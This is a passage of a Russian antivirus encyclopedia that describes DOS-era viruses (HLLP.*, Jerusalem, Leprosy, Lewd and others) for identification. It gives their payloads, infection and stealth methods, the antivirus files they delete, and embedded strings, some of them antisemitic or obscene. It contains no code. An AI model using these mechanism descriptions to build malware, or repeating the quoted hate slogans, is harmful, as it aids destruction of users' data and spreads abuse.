При нажатии на "A" вирус заканчивает работу, не отдавая управление программе-вирусоносителю. При нажатии на "R" вирус повторяет сообщение про ошибку. При нажатии на "I" производится перезагрузка системы. При нажатии на "F" вирус выводит текст "Fail on INT 24" и выходит в DOS. Содержит текст "Copyright©95 Moonlight Productions.".

HLLP.Myxa

Неопасный нерезидентный вирус. При совпадении значений месяца, дня и дня недели (например, первого января в понедельник и т.д.) иногда после запуска инфицированных программ проявляется графическим видеоэффектом похожим на бурлящую лаву и выводит текст "°±ІЫ Error free ЫІ±°". Содержит текст "Myxa".

HLLP.NotFound.6176

Неопасный нерезидентный вирус. Написан на Turbo Pascal. Содержит текст:
Borland Virus © 1994
Processor Intel PentiumTM not found.
17Gb disk free space not found.
512Mb extended memory not found.
16Mb XGA Video card not found.
Sound Blaster not found.
Sorry, your configuration doesn't match to run this...

HLLP.Novokuz>

Нерезидентный вирус. Содержит текст "Novokuznetsk - the city of FidoFuckers Feci Quod Potui, Faciant Meliora Potentes ".

HLLP.RedAlert

Опасный нерезидентный вирус. Заражает EXE-файлы. В COM-файлы вирус записывает 23 байта кода, которые устанавливают системную дату в 1-ое января 2000 года и возвращают управление DOS. Также в эти COM-файлы записывается текст "Infected by Red Alert". Но возможно корректное восстановление таких COM-файлов.

HLLP.Rsw.5846

Неопасный нерезидентный вирус. Написан на языке высокого уровня, видимо, Turbo Pascal и упакован утилитой PKLITE v.1.12. В теле вируса присутствуют текстовые строки, принадлежащие компилятору фирмы Borland. Вирус производит поиск *.cOm и *.exE -файлов в каталогах, доступных через переменную PATH. Создает файл vvc.13 в каталоге найденного файла, записывает в созданный файл 5846 байт вирусного кода, после чего копирует файл-жертву в новый файл vvc.13. В дальнейшем удаляет оригинальный файл и присваивает файлу vvc.13 имя удаленного файла. В каталоге запущенного на выполнение инфицированного файла, вирус создает новый файл nortom.ini и копирует в него код зараженного файла без вирусного кода. По окончании своей работы вирус запускает на выполнение файл nortom.ini, после чего удаляет данный файл. В заголовке вируса по адресу 1Eh находится текстовая строка: "Я люблю пиво,компы и женщин By Rsw. Version 2.10.". 17 числа любого месяца вирус выводит на экран текст:
Блин , сегодня мой день рождения.
Я так рад , что не буду даже не чего зарожать .
Copyright © 1994 by RSW
Release 17.06.94 , v. 2.10 (BugFix)
После чего, не отдавая управление программе-вирусоносителю заканчивает работу. Хорошо когда у человека 12 раз в году день рождения - тогда хоть раз в месяц, но и у нас будет праздник, и такой вот вирус "не чего зарожать" не будет.

HLLP.Rsw.8304

Аналогичен HLLP.Rsw.5846. Не упакован PKLITE. 17 числа любого месяца выводит сообщение:
I'm sorry You hawe virus.!
My name VVC 13 version 1.0 beta.
Special Thank's auhtor viruses Yeanke Doodle , Lozinsky D.N.
Virus by VVC & RSW release 25.02.94

HLLP.Satyricon.6624, 7824, 7840

Иногда оставляют в памяти резидентный код, который выводит текст "General error: Smoked cigarrete on hard disk C:".Содержат также строку "Satyricon v1.0".

HLLP.Unsteady (1,2)

Опасные нерезидентные вирусы. С марта по сентябрь или с февраля по август (HLLP.Unsteady (2)) выводят текст:
No Stealth, No Boot, No Stupid, but
this PC is now U N S T E A D Y !!!
Violated by Ludvi®ka L. PC virus !!!
После чего пытаются удалить файл CONFIG.SYS на текущем диске.

HLLP.UPI

Очень опасный нерезидентный вирус. Упакован PKLITE. Пытается удалить или разрушить файлы, имеющие расширения PAS,BAS,TXT,BAK,PCX,MID,PIC, CUT,C,ARC,PAK,ZIP,LZH,ICE, CHZ, ARJ. Содержит текст "Data Terminator 1.2,1993,UPI".

HLLP.Viper.7792

Неопасный нерезидентный вирус, написанный на Turbo Pascal в формате EXE -файла и упакованный компрессором PKLITE 1.12. Производит поиск файлов a*.*cOm и a*.*exE в каталогах, доступных через переменную PATH. Создает файл $viper$.TmP, в который копирует программный код стартовавшей инфицированной программы. При нахождении файла-жертвы, вирус создает файл $viper$.tm1, записывает в него 7792 байта вирусного кода, после чего копирует в этот файл программный код файла-жертвы. Удаляет файл-жертву и присваивает файлу $viper$.tm1 имя файла-жертвы. По окончании своей работы вирус запускает файл $viper$.TmP, после чего удаляет его.

HLLP.Weed.4080 (1,2), 5850 (1-5)

Опасные нерезидентные вирусы. Могут разрушить некоторые файлы при заражении.Упакованы LZEXE. HLLP.Weed.4080 содержит текст "WEED - v1.1".

HLLP.Xenia

Опасный нерезидентный вирус. В зависимости от своих счетчиков может уничтожить MBR и вывести текст:
Out of enviroment space
Memory allocation error, system halted.
А также в период с 2.00 до 4.00 выводит текст:
...Xenia... i will not forgive your treachery... ...but I love you... (S`96)
...hard disk 1 seems to be non-DOS disk...
и пытается отформатировать первую дорожку первого жесткого диска.

HLLP.Zenit

Неопасный нерезидентный вирус. Написан на Turbo Pascal. Иногда выводит текст:
Санкт-Петербургский
Футбольный клуб "ЗЕНИТ"!

Holera.1488

Очень опасный резидентный вирус. В файлы, имеющие расширения TXT и CPP, вирус записывает тексты: "На дворе трава, на траве дрова... Special for MIEM" и "Карл у Клары украл караллы, а Клара у Карла украла кларнет..." соответственно. Содержит текст "HOLERA II".

Holiday.2900

3 марта выводит сообщение. После чего ждет наступления 4 марта. Если этот день наступил, то вирус выводит текст:
Thank You for playing, see you...
Please, hit ENTER!

Holms.6161

Полиморфный вирус с очень серьезным алгоритмом шифрования. Пытается скрывать свое присутствие в компьютере - продлить свой "инкубационный" период. Для этого вирус подсчитывает контрольную сумму участка ПЗУ и запоминает ее. Если CRC ПЗУ при старте вируса не совпадает с ранее запомненной, то вирус устанавливает свою TSR-копию в память и заражает файлы. Если CRC совпадает - вирус активизируется с 17 числа месяца или через неделю после заражения данного файла. Т.о., в каждом зараженном файле хранится CRC участка ПЗУ и информация о времени его заражения. При заражении файла самостоятельно создает файл со случайным именем без расширения, копирует в него содержимое файла-жертвы, и удаляет файл-жертву. Заражает созданный файл и присваивает ему имя оригинального, ранее удаленного файла. При активном резидентном вирусе, при одновременном нажатии на левый и правый Shift, вирус проигрывает мелодию из фильма "Шерлок Холмс и доктор Ватсон" или прерывает ее. Файл COMMAND.COM вирус не заражает. В теле вируса имеются текстовые строки: "PATH=COMMAND COMEXE*.*", "Copyright 1989-1992. Version 1.05-NC for antivirus program debugging." и "Holms.".

Hoodoo.4456

Опасный нерезидентный шифрованный вирус. Под отладчиком или 21 числа месяца уничтожает содержимое жесткого диска и выводит на экран текст:
HOODOO V1.0 ©1996 by Terminus

Horsa.1185, 1230

Неопасные нерезидентные вирусы. Ищут *mand.com-файлы.Производят чтение и запись в файлы с помощью INT 25h, 26h (дисковые чтение, запись через драйверы DOS).

Hymn.1865, 1962 (1,2), 2144

Опасные резидентные (Hymn.1962 , 2144 - шифрованные) вирусы. Работоспособны только в MS-DOS версии 3.30. В день, значение которого совпадает со значением месяца, вирусы обнуляют некоторую служебную информацию в активном загрузочном секторе первого жесткого диска, фальшиво исполняют Гимн СССР и выводят следующую картинку.

Hypervisor.3120, 3128

Опасные резидентные вирусы. Определяют наличие локальной сети и предпринимает попытки "взлома" сети Novell. Содержат тексты:
HYPERVISOR
SECURITY_EQUALS
SUPERVISOR
GROUPS_I'M_IN
PASSWORD
IDENTIFICATION
IDENTIFICATIONThe
Hypervisor
LOGIN_CONTROL
SYS:SYSTEM/SYS:LOGIN/
NET$BIND.SYS NET$BVAL.SYS NET$OBJ.SYS NET$PROP.SYS NET$VAL.SYS
SECURITY_EQUALS
SUPERVISOR
GROUPS_I'M_IN
PASSWORD
IDENTIFICATION
IDENTIFICATIONThe
LOGIN_CONTROL

Hypnotiser.1784

Неопасный резидентный шифрованный вирус. Уничтожает файлы chklist.ms. Не активизируется при запуске в DOS-сессии MS-Windows, а также пытается удалить свою копию из памяти при запуске Windows. 10 числа месяца выводит на экран "радужные" картинки и слово "HYPNOTiSER". Содержит текст "HYPNOTiSER. By bQ".

J

Jerusalem (1,2)

Опасные резидентные вирусы. Рисуют в левом нижнем углу черный квадрат и существенно замедляют скорость работы компьютера. В пятницу 13 числа удаляют все запускаемые программы.

Jerusalem.Barcelona

Неопасный резидентный вирус. Иногда выводит сообщение:
CATALUNYA LLIURE
FORA LES FORCES D`OCUPACIO
MORT ALS TERRORISTES TRICORNUTS

Jerusalem.Canary.1970

Иногда мигает экраном и исполняет какую-то мелодию. Содержит строку "\COMMANDMC70: Moroccan Canary".

Jerusalem.Cvex.5120 (1-10), 6144, 6400

Некоторые из этих вирусов являются опасными. 10 июня они уничтожают содержимое первых 17 секторов жесткого диска. Jerusalem.Cvex.6144,6400 являются опасными полиморфными вирусами. Вирусы содержат тексты на китайском и английском языках:
COMMAND.COM IBMBIO.COM IBMDOS.COM SETVER.EXE EMM386.EXE DOSSHELL DEBUG
SERVER.EXE VSAFE MSAV MWAV CPAV NAV TRACER TRMATE HACKER GILLETTE
PCCILLIN TPS ZLOCK ZTEST GSCAN HVIR AVCOM AVEXE OFFEXE OFFCOM CKVI KLVI
DEVI BTOOL RTOOL TDISK HDPI VCOPY VSHIELD VALIDATE VB TEST VIR WIN
KERNEL.EXE KRNL GDI.EXE USER.EXE PROGMAN.EXE DOSX.EXE EXCEL CV.EXE
SYMDEB MASM.EXE LINK.EXE LIB.EXE BASIC BASCOM BASRUN ET.COM ET16N.COM
ET16E.COM ET16V.CO A-16.COM PE3 DW3 ACAD CLP FOX DBASE CLIPPER RTLINK
LOTUS 123
CVEX Version 3.00
© Copyright CVEX Corp. (in association with Stoned II Lab.)
All rights reserved. Made In Taiwan.
Serial No.:1993/3/6.
Computer Virus Extened Association. (C.V.E.X.)
или подобный этому:
CVEX Version 4.00
for Microsoft MS-DOS Version 6.2
© Copyright CVEX Corp. (in association with Stoned II Lab.)
© Copyright PATLABOR Corp.
All rights reserved. Made In Taiwan.
Serial No.:1994/1/1.
Computer Virus Extended Association. (C.V.E.X.)

Jerusalem.Czech

Опасный резидентный вирус. Через 30 минут после установки своей TSR- копии постоянно выводит в левом верхнем углу экрана мигающее слово "Ha!Ha!". Удаляет программы BASICA.EXE, CURE.EXE, LOTUS.COM, CWI.EXE, ETBASIC.EXE, BASICA.COM, 123.XE, DBASE.EXE, BASIC.COM при их старте.

Jerusalem.Distrutto

Опасный резидентный вирус. 4 ноября форматирует все доступные диски и выводит сообщение:
******* Ora il tuo PC e' DISTRUTTO !!! *******

Jerusalem.Glory

Неопасный резидентный вирус. 4 марта расшифровывает и выводит текст:
Eternal glory to those Chinese people who fell in 1989,
in the noble struggle for freedom of speech, expression,
the press, assembly, association, procession,
demonstration and the freedom to strike!
Not one single drop of blood, not one single tear,
not one single act of courage will have been wasted in vain.
Wild grasses spreading o'er the plain
With every season come and go.
Heath fire can't burn them up, again
They rise when the vernal winds blow.

Jerusalem.Invader (1-10)

Очень опасные резидентные вирусы. Заражают COM и EXE-файлы (кроме COMMAND.COM) и boot-секторы жестких дисков и флоппи-дисков. Для флоппи форматируют дополнительную дорожку, на которую записывают собственный код и оригинальный boot-сектор. Перехватывают INT 8, 9, 13h, 21h. В зависимости от своих внутренних счетчиков могут совершать холостой цикл при каждом вызове прерывания INT 8 (таймер), уничтожать информацию на дисках, исполнять мелодию, уничтожать содержимое CMOS-памяти.

Jerusalem.Kylie

Иногда играет мелодию. Имеется строка "Kylie Minogue".

Jerusalem.Mabuhay.2660 (1,2), 2695

Опасные резидентные вирусы. 1 числа (Jerusalem.Mabuhay.2660) или 12 июня (Jerusalem.Mabuhay.2695) вирусы пытаются уничтожить содержимое дисков C:, D:, E:,F: играют Филлипинский гимн.

Jerusalem.Sunday

Опасный резидентный вирус. Удаляет все запускаемые программы.

Jerusalem.VTec

Опасный резидентный вирус. Уничтожает файлы CHKLIST.CPS и SMARTCHK.CPS. 10 марта уничтожает содержимое CMOS-памяти и секторов дисков. После чего выводит сообщение:
Don~t TRUST any virus scanner!
-- HKs VTech --

Jerusalem.Wanderer

Неопасный резидентный вирус. Не заражает файлы, имена которых начинаются на WP, SC, WI. Содержит зашифрованный текст "[I am a Wanderer ,May 30th,1994 Korea]".

Jindra

Очень опасный загрузочный стелс-вирус. Периодически уничтожает содержимое секторов дисков и CMOS-памяти. Содержит текст "JINDRA_0".

Jindra.2049

Очень опасный нерезидентный полиморфный вирус. В зависимости от своих внутренних счетчиков может уничтожать содержимое секторов дисков, CMOS- памяти и выводить на экран текст "Jindra&Pastika je zde !!!". А также Jindra.2049 может заразить активный загрузочный сектор жесткого диска загрузочным вирусом Jindra, который в дальнейшем будет "развиваться" отдельно от родителя и заражать сектора дисков. Jindra.2049 удаляет файлы: CHKLIST.MS, C:\AVG*.GRS, C:\AGUARD.DAT, C:\DOS\VSAFE.COM, VSAFE.COM.

Joker.1918

Неопасный резидентный шифрованный вирус. Содержит текст "Kiev '95 by Pupil of 9-V form [JOKER.HA-HA-HA!]:G:AZ JOKERSYS".

Jolter.2197

Неопасный резидентный шифрованный стелс-вирус. Иногда вызывает "дрожание" экрана. Содержит тексты "ARJBSACHKDIEICELHAPKLPKZRAR", "COMMAND.COM", "COMMAND EXECOM", "*.COM *.EXE", "IBMJOLTER 4.0".

Joshi

Неопасный загрузочный стелс-вирус. "Переживает" теплую перезагрузку при нажатии Ctrl-Alt-Del. 5 января выводит текст "Type `Happy Birthday, Joshi'!" и ждет ввода с клавиатуры фразы "Happy Birthday, Joshi!".

Jouce.1608

Опасный нерезидентный вирус. По средам автор, видимо, хотел уничтожать 255 секторов жесткого диска, но этого не происходит. Но непристойный текст по средам выводится на экран. Вирус также содержит текст "*Jouce und Krisque*, Version 0001h.".

July29 (1-4)

Опасные загрузочные вирусы.Заражают boot-сектора дискет и "винчестера". Располагаются в трех последовательных секторах. Если в процессе считывания двух последних секторов "хвоста" вируса произойдет ошибка чтения,то вирусы выводят сообщение "BIOS fatal error. System halted..." и "вешают" систему. При заражении жесткого диска вирусы записывают истинный MBR и следующий за ним сектор в 6 и 7 сектора нулевого цилиндра. В оригинальном MBR вирусы исправляют 3 байта адреса активного раздела DOS на адрес: головка - 0, цилиндр - 0, сектор - 3. И записывают с указанного адреса 3 сектора вирусного кода.Вирусы являются стелс-вирусами. При попытке чтения или записи в MBR или boot-сектора дискет, подставляется оригинальный неинфицированный сектор. На компьютерах класса AT, 29 июля вирусы выводят сообщение "July 29 today..." и вирусы July29 (1-3) перехватывают INT 09 (клавиатура). Если произойдет нажатие на Ctrl-Alt-Del, то вирусы уничтожают содержимое 7ми первых секторов жесткого диска.
July29 (2) блокирует исполнение некоторой программы (видимо, ADINF.EXE), а July29 (3) излечивает MBR жесткого диска при старте или чтении первого сектора этой же программы. July29 (4) "перехватывает" INT 8,9,13h,21h.При нажатии на Ctrl-Alt-Del этот вирус заражает еще раз для "подстраховки" заражает MBR жесткого диска. При старте программ с именами *T.E*, *B.E*, *F.E* (AIDSTEST.EXE, DRWEB.EXE, ADINF.EXE) July29 (4) или "вешает" систему, или удаляет свой код из MBR на время работы данных программ. Вирусы July29 замещают своими кодами загрузочные вирусы семейства Stoned. Содержат также строки: July29 (1)- "v3.1", July29 (2) - "v4.1", July29 (3) - "v4.5", July29 (4) - "v5.0". July29 (4) 29 числа удаляет каждую 8 стартовавшую программу.

JumpBoot

Опасный файлово-загрузочный вирус. Заражает MBR жесткого диска, а также внедряется в файлы, записываемые на гибкие диски. При старте такого инфицированного файла вирус заражает MBR жесткого диска, записывая оригинальный сектор и свое продолжение в два сектора на первой дорожке, содержащие нулевые байты. При загрузке системы с инфицированного MBR, вирус располагает часть своего кода в таблице векторов прерываний по адресу 0:200h и перехватывает INT 13h. При записи на жесткий диск сектора, содержащего первыми байтами EBh или E9h (переход-jump) вирус записывает вместо этого сектора свой код. Причем после этой записи вирус обезвреживает в памяти данную процедуру заражения файлов. Т.е., до следующей перезагрузки производится всего одна запись на гибкий диск. Вирус также является стелс-вирусом, подставляя вместо инфицированного MBR оригинальный сектор.

Jumper (1,2)

Неопасные загрузочные вирусы.При старте с флоппи-диска, вирусы заражают MBR "винчестера", "перехватывают" INT 1Ch, ждут загрузки DOS, после чего "перехватывают" INT 21h. Заражают флоппи-диски при функциях ввода- вывода на консоль и смене текущего диска (f.0Ah, 0Eh Int 21h). Иногда выводят на экран символ "ю" ASCII 0EEh.

JuneTunes.1784

В июне с вероятностью 3/4 играет одну из трех мелодий.

Junior.224

Неопасный резидентный вирус. Изменяет вызов INT 21h для старта программ резидентной части командного процессора на INT AEh и перехватывает INT AEh. Содержит строку "Junior".

L

Lame.2304

Неопасный резидентный полиморфный вирус. 15 сентября выводит на экран текст:
SHATTERED/Pantera/Cowboys from Hell
It's storming broken glass, corpses left in piles
Ungracious bludgeonment that breaks the earth for miles
Nothing can stop it, the day has come, from below it's catastrophic
Freezing, there's no healing families are dying
This world is shattered...all shattered
Life crushing turbulence, this wrath can't be denied
Wishing you could help your friends, standing where they died
Echoes haunting, a hollow planet, lacerations, dissected nation
Freezing, there's no healing families are dying
This world is shattered...all shattered
Содержит также строку "This is a polymorphic virus Блокирует нажатие на левую клавишу "Shift",а также каждый час блокирует нажатия на клавиши Escape, Backspace, Enter, Left Ctrl, Left Alt.

Legion.3274

Неопасный нерезидентный шифрованный вирус. Алгоритм заражения файлов заимствован из вирусов семейства OneHalf.

Lego.1000

Опасный резидентный шифрованный вирус. После 400 заражений файлов уничтожает некоторые поля CMOS-памяти.

Lemena.3544

Hеопасный резидентный полиморфный вирус. Располагает свою зашифрованную резидентную копию в области XMS и "перехватывает" INT 22h, обработчик которого тоже зашифрован и расположен в свободной области ядра DOS. По окончании работы любой программы вирус копирует свой код из XMS в видео-память (0BC00:0000h), расшифровывает его и "перехватывает" INT 21h. Вирус использует динамическую расшифровку собственного кода. Удаляет файлы: ANTI-VIR.DAT, AVP.CRC, CHKLIST.CPS, CHKLIST.MS, CHKLIST.TAV, CRC.SVS, FILES.VVL, FINGERP.VVF, IM.PRM, IVB.INI, IVB.NTZ, MSAV.CHK, SMARTCHK.CPS, \AV.CRC, \BOOT.CPS, \BOOT.MS, \BOOT.NTZ, \BOOT.TAV, \IV.INI, \PART.NTZ. Может вывести на экран текст "LEMENA'97" или "BOKEPH'97". Также содержит тексты "[LEMENA'97] by Bokeph from Batavia, Indonesia", "[MENA]".

Lemming.2247

Неопасный резидентный шифрованный стелс-вирус. При открытии инфицированных файлов вирусы лечат их. Не заражает программы из списка DRWEBAVPAIDSTESTVSAFEFPROT. Производит поиск в памяти антивируса TBDriver и правит его код.

Lenin.943

Нерезидентный вирус. Производит поиск *.EXE в директориях доступных через переменную PATH и в текущей. Записывается в конец файлов, но вставляет 5 байт прямого межсегментного "длинного" call на свое тело в оригинальную точку входа EXE-файла, корректируя при этом таблицу перемещаемых символов. Но при этом не проверяет наличие ссылки в этой таблице на данную точку, в результате чего такая программа при запуске может "завесить" систему. Иногда после заражения файла может выдать текст:
САМЫЙ! ЧЕЛОВЕЧНЫЙ! ЧЕЛОВЕК!
Ленин и сегодня всех живых держит мертвой хваткой упыря

Leo.1965

Опасный нерезидентный вирус. 13 апреля пытается отформатировать жесткий диск и произвести другие "пакости", но из-за ошибок деструктивный код вируса не сработает. Вирус содержит зашифрованный текст:
Version 3.0.
Virus has written by Leo..
Korolev city 1998

Leprosy.Busted.572

После заражения файлов выводит сообщение "Busted!" или "Program too big to fit in memory". Содержит текст "This is based on Leprosy-B. Thanx PCM2Busted, Strain A, version 1.0By ШАЧ@&ю·іЅ$ (Psychogenius), September '91".

Leprosy.Hellrais

Очень опасный зашифрованный вирус. Периодически уничтожает информацию в 4 случайных секторах диска. После 25 числа в пятницу выводит текст:
I'll be back...

Leprosy.Rythem.808

25 числа в пятницу уничтожает все файлы. Содержит текст:
Skism Rythem Stack Virus-808. Smart Kids Into Sick Methods
Dont alter this code into your own strain, faggit.
HR/SSS NYCity, this is the fifth of many, many more....
You sissys.....

Leprosy.Sandra.1809, 1356

Очень опасные полиморфные вирусы. Производят поиск файлов *.eXe и *.cOm и внедряют свой код в начало данных файлов, не сохраняя программный код. Уничтожают файлы: )(.ID, ANTI-VIR.DAT, C:\TBAV\VIRSCAN.DAT, CHKLIST.CPS,C:\CPAV\CHKLIST.CPS, C:\NAV_._NO, C:\NOVIRCVR.CTS,C:\VS.VS, C:\NOVIPERF.DAT,C:\TOOLKIT\FILES.LST, C:\FSIZES.QCV, C:\UNTOUCH\UT.UT1, C:\UNTOUCH\UT.UT2. Содержат строки "SANDRA*.eXe *.cOm ..", "This Virus is dedicated to Sandra H., V0.07", "© Nazg".

Leprosy.Seneca.483, 493

Очень опасные нерезидентные вирусы. 25 ноября выводят текст:
HEY EVERYONE!!!
Its Seneca's B-Day! Let's Party!
После чего уничтожают содержимое 255 секторов текущего диска. Также могут вывести сообщение "FATAL ERROR -- EXE is Fucked!!!" или
You shouldn't use your computer so much, its bad for you and your computer.

Leprosy.Strain.666 (1,2)

Очень опасный нерезидентный вирус. Выводит сообщения:
Program too big to fit in memory
или
ATTENTION! Your computer has been afflicted with
the incurable decay that is the fate wrought by
Leprosy Strain B, a virus employing Cybernetic
Mutation Technology™ and invented by PCM2 08/90.
Существует модификация вируса, которая выводит текст
Stealth Group Moscow Приглашает Вирусописателей !
Объединяйтесь ! Только Вместе Мы Прикончим
лОЗОТЕСТ , pOLYFUCK и Средства От Глистов !
Grosser & Mr.Tapeworm = Kool Men !"SPIDER" By Tapeworm !

Lev.693

Неопасный резидентный вирус. Ведет счетчик заражений в MBR. После 224 заражений возможно "осыпание" экрана и появление сообщения:
Бей жидов и Лозинского
Version d13,copyright © 1991 by LEV & "С.Х."

Lewd.3256, 4455, 4456

Неопасные резидентные вирусы. По нечетным числам месяца пытаются через некоторое время "повесить" систему. Иногда выводят на экран текст "Люся-а-а...". Lewd.3256 иногда выводит на экран текст "Главный Центр Напугивания.". Содержат текст "1996 by Lewd-H".

Lewd.34907, 34918

Опасные резидентные вирусы. Содержит в своем теле код архиватора LHA версии 2.13, который периодически пытаются записать на диск, спрашивая об этом разрешение пользователя. А также периодически выводят следующие сообщения:
Начиная с 1997 года активно начала свою работу MDP база по борьбе с нехваткой программного обеспечения.Сегодня мы препредлагаем вашему вниманию "File-Compression Program LHA version 2.13". Copyright 1997 by MDP Base. УСТАНОВИТЬ? [y/n]. Алло народ вы че обалдели у вас здесь еррора выползает.Больше не хулиганьте. О-о-й и куда это вы полезли!!! Голубчик и вы думаете это вас спасет??? Вам следовало бы обновить вашу версию дантиста WEBа.Он же вам каждый раз об этом напоминает.Старших надо слушаться!!! С MDP базы доносятся крики благодарности DRWEBу за отличный Executable File Decompressor например PKLITE с пакшей "-e" .Поблагодарим его за это.УРА!!! ПОКА. Ух ты у вас AIDSTESTик есть.Где откопали? Ну если не хотите то можете не отвечать. Опять на халяву? Ай-я-я-я-яй как вам не стыдно? Что бы больше такого не было! На MDP базе все по прежнему.РЕКЛАМНАЯ ПАУЗА. Upgraded Извините.Этого у нас нету.Приходите завтра. Вы точно хотите стереть эту директорию? Ну ведь она же исчезнет!Вы уверены? Нет не могу.Правда!Идите подумайте а потом прийдете. Ну уж нет.Вы мало думали.Надо все хорошенько обдумать! Ну ладно так уж и быть но помните что я вас предупреждал. У вас чего крыша едет? На ноль же делить нельзя.Я понимаю что это сложно понять но надо быть более рассудительнее. Анн дара рия кия макарена.Анн дара рия рия сол де рио.

Likeness.3551

Очень опасный резидентный файлово-загрузочный полиморфный вирус. Очень похож на вирусы OneHalf. По очень похожему алгоритму зашифровывает первый жесткий диск.Но при активном резидентном вирусе данные изменения не заметны, т.к., вирус пытается расшифровывать зашифрованные сектора диска "на лету" при обращении к ним.Но процедура шифровки и расшифровки содержит массу ошибок, из-за которых информация может быть расшифрована неправильно.При инсталляции в память вирус модифицирует код резидентной программы TBDSK, если она присутствует в памяти. Не заражает файлы, начинающиеся на: ADINF, ANTI, AIDS, DRWEB,TB,SCAN,CHK. Программа Dr.Web не расшифровывает диск при нахождении в MBR вирусного кода. Но при нахождении в памяти резидентной копии вируса, Dr.Web модифицирует его код таким образом, что вирус сам будет расшифровывать зашифрованные сектора на диске при обращениях к ним. Для того, чтобы попытаться расшифровать весь диск необходимо установить режим проверки всех файлов во всех каталогах первого жесткого диска и запустить тестирование программы Dr.Web. Но наиболее правильным было бы, при обезвреженном вирусе в памяти скопировать всю важную информацию на резервные магнитные носители.

Linux.Bliss.17892, 18064

Неопасные нерезидентные вирусы,"обитающие" в среде Linux (разновидность ОС Unix) и заражающие исполняемые файлы в формате ELF.Написаны на языке GNU C. Внедряются в начало ELF-файлов, сдвигая программный код вниз.

LivingDeath.3766

Очень опасный резидентный стелс-вирус. "Перехватывает" INT 8, 13h, 21h. Заражает EXE-файлы и MBR жесткого диска. Примерно через месяц после заражения MBR вирус читает в память 255 первых секторов первого жесткого диска, записывает на их место случайную информацию. После чего производит зашифровывание всего первого жесткого диска. По окончании данной шифровки вирус записывает на место информацию 255 первых секторов и выводит строку:
Press any key ...
При обращении к зашифрованным секторам через INT 13h вирус расшифровывает содержимое данных секторов "на лету". Таким образом, в инфицированной системе содержимое первого жесткого диска расшифровывается резидентной копией вируса. При загрузке с инфицированного уже зашифрованного жесткого диска вирус выводит текст:
I am the Living Death.
Press any key ...
И ждет нажатия на любую клавишу.

Lizard.1967

Опасный резидентный (на уровне Windows VxD-драйвера) вирус. Заражает DOS EXE-файлы и создает вирусный VxD-драйвер. При старте зараженого EXE-файла вирус создает свой VxD-дроппер (при его отсутствии) в одном из каталогов системы:
c:\windows\system\iosubsys\lzd.vxd,
c:\win95\system\iosubsys\lzd.vxd,
c:\windows.000\system\iosubsys\lzd.vxd.
При старте MS-Windows вирусный дроппер автоматически загрузится в систему. Далее Lizard.1967 заражает DOS EXE-файлы стандартным способом при попытке доступа к ним. 26 октября вирус удаляет эти файлы. Содержит текст "Lizard by Reptile/29A".

Lmd.2000

Неопасный резидентный полиморфный вирус. Также может вывести на экран фотографию Лозинского Д.Н. и текст "Lozinsky MuST DiE!".

Lobotomy.821

Неопасный нерезидентный вирус. После заражения файла может вывести текст:
Летний дождик напугал ...
Летний дождик напугал ...
Летний дождик напугал ...
Летний дождик напугал ...
Лаа-ба-та-мия ...
Лаа-ба-та-мия ...
Лаа-ба-та-мия ...
Лаа-ба-та-мия ...
Лаа-ба-та-мия ...
Лаа-ба-та-мия ...
Лаа-ба-та-мия ...
Лаа-ба-та-мия ...
Лаа-ба-та-мия ...
Лаа-ба-та-мия ...
*** LOBOTOMYя v1.1beta ©1995 MSfVC *** +: ***

Lobotomy.966

Опасный нерезидентный вирус. Удаляет таблицы ревизора ADinf на всех дисках. Попытаться установить пароль "LOBOTOMY" в CMOS Setup и "завесить" систему.

Locust.735

Опасный резидентный вирус. Перехватывает INT 09,21h,2Fh. С вероятностью 1/8 блокирует нажатия на клавиши Escape, Enter или Space. И в 1 из 32 случаях изменяет нажатие на клавиши с латинскими буквами "A", "E", "O" на русские "А", "Е", "О". Содержит тексты ".COM", "Locust".

Locust.1456

Нерезидентный вирус. Заражает один файл - командный процессор, как правило COMMAND.COM, указанный через переменную среды COMSPEC. Причем, если размер COMMAND.COM не превышает 53336 байт, если он не формате EXE-файла, и если COMMAND.COM содержит область повторяющихся байт в конце файла. Вирус изменяет первые 3 байта инфицируемого файла, если первая инструкция не JUMP или 3 байта из области первого перехода, если первая команда - JUMP, на команду перехода на вирусный код, который Locust.1456 записывает в середину файла. Содержимое же места внедрения вируса, переносится в область повторяющихся байт. Размер инфицированного файла уменьшается на 240 байт. Вирус содержит ошибки, следствием которых возможно неточное восстановление файла при его лечении. Иногда может заполнить экран строкой "I'm Sleep-walker.". Содержит зашифрованную строку "(LOCUST-3)".

Locust.2486

Неопасный резидентный вирус. Если файл содержит в конце область из 2486 повторяющихся нулевых байт, то вирус записывает свой код в данную область, иначе внедряется в конец файла.

Login.2071

Неопасный резидентный полиморфный вирус. Внедряет полиморфный расшифровщик в середину заражаемого файла, а основной зашифрованный код в конец файла. 10 числа каждого месяца выводит на экран текст "This is Kustanai-Login. Is devoted Kuzmina Olya. TVA-96 me 16!"."Перехватывает" INT 9, 21h. При старте программы Login, вирус контролирует нажатия на клавиши и записывает скан-коды данных клавиш в свой буфер, находящийся в памяти. Не заражает программы,имеющие в своем буквосочетания Aids, Adinf, DrWeb, Scan, Command.

Lokjaw.Firefly.1087

Опасный резидентный шифрованный вирус. При старте некоторых антивирусных программ, удаляет их. Содержит тексты:
[Firefly] By Nikademus
Greetings to Urnst Kouch and the CRYPT staff.
American Jesus
Dont Pray On Me
Recipe for HAte
Atomic Garden
Its Dead Jim

Lokjaw.Firefly.1106

Опасный резидентный шифрованный вирус. При старте некоторых антивирусных программ, удаляет их.

Lokjaw.Zwei.808, 894

Опасные резидентные вирусы-спутники. При старте некоторых антивирусных программ, удаляют их.

Lonely.1000

Неопасный резидентный шифрованный вирус. "Перехватывает" INT 9, 1Ch, 21h. Заражает файлы при их запуске или закрытии. При открытии инфицированных файлов вирус "излечивает" их. При вводе с клавиатуры слова "малыш" вирус отключает режим заражения файлов, но оставляет режим "самоизлечивания". Проявляется "западанием" левой клавиши Shift. Содержит текст ""Одиночка" v1.0 ХАИ к.506 1995г.".

Lout.805

Опасный резидентный вирус. Иногда выводит на экран фразу "Андреев - хам и жадина.". После чего может обнулить в Boot-секторе диска C: значение количества головок диска (+1Ah).

LR1.2884

Опасный резидентный шифрованный вирус. Удаляет файлы CHKLIST.MS, CHKLIST.CPS, ANTI-VIR.DAT, SMARTCHK.CPS. При нажатии на Alt-PrtSc (SysRq) вирус выводит текст "LR1#00008", где числовое значение - это номер поколения вируса.

LSD.1600

Очень опасный, замещающий программный код, вирус. После заражения всех файлов текущем каталоге производит графический видеоэффект (двигающиеся цветные узоры) и.

Luce.4619

